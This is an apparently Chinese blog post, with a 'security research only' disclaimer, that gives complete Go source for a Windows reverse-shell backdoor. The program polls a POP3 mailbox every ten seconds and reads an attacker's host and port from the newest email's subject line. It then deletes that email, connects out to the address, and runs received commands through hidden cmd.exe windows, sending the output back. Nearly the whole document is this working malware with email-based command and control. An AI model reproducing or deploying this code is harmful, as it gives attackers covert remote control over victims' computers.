golang写的反弹shell（自作孽不可活，切记，切记！）

golang写的反弹shell（自作孽不可活，切记，切记！）"/>

golang写的反弹shell（自作孽不可活，切记，切记！）

仅作安全研究

package main
import ("os/exec""go-pop3""log""strings""net"// "fmt""syscall""bufio""time"
)//反弹shell函数
func reverseshell(addr string){if c,_:=net.Dial("tcp", addr); c != nil {for{status, _ := bufio.NewReader(c).ReadString('\n');//显示输入命令// fmt.Println(status)//输入exit命令退出if status == "exit\n" {break}//输入Ctrl+C时字符为空退出if status == "" {break}//执行命令返回结果cmd := exec.Command("cmd", "/C", status)cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true}out, _ := cmd.Output();c.Write([]byte(out))}}
}//获取Email中的地址并调用反弹shell函数
func Get_Address_to_Rverse_shell(username string, password string){client, err := pop3.Dial("pop.sina:110")if err != nil {log.Fatalf("Error: %v\n", err)}defer func() {client.Quit()client.Close()}()if err = client.User(username); err != nil {log.Printf("Error: %v\n", err)return}if err = client.Pass(password); err != nil {log.Printf("Error: %v\n", err)return}var count intvar size uint64if count, size, err = client.Stat(); err != nil {log.Printf("Error: %v\n", err)return}log.Printf("Count: %d, Size: %d\n", count, size)var content stringif content, err = client.Retr(count); err != nil {log.Printf("Error: %v\n", err)return}if err = client.Dele(count); err != nil {log.Printf("Error: %v\n", err)return}if err = client.Noop(); err != nil {log.Printf("Error: %v\n", err)return}if err = client.Rset(); err != nil {log.Printf("Error: %v\n", err)return}//处理邮件object，获取地址list := strings.Split(content, "\r\n")for i := 0; i < len(list); i++ {line := list[i]if strings.Contains(line, "Subject:"){addrlist := strings.Split(line, ":")if len(addrlist) == 3 {temp_addr := addrlist[1] + ":" + addrlist[2]ADDR := strings.Replace(temp_addr, " ", "", -1)reverseshell(ADDR)// go reverseshell(ADDR)}}}
}func main(){username := "xxx"password := "xxx"for{Get_Address_to_Rverse_shell(username, password)time.Sleep(10 * time.Second)}}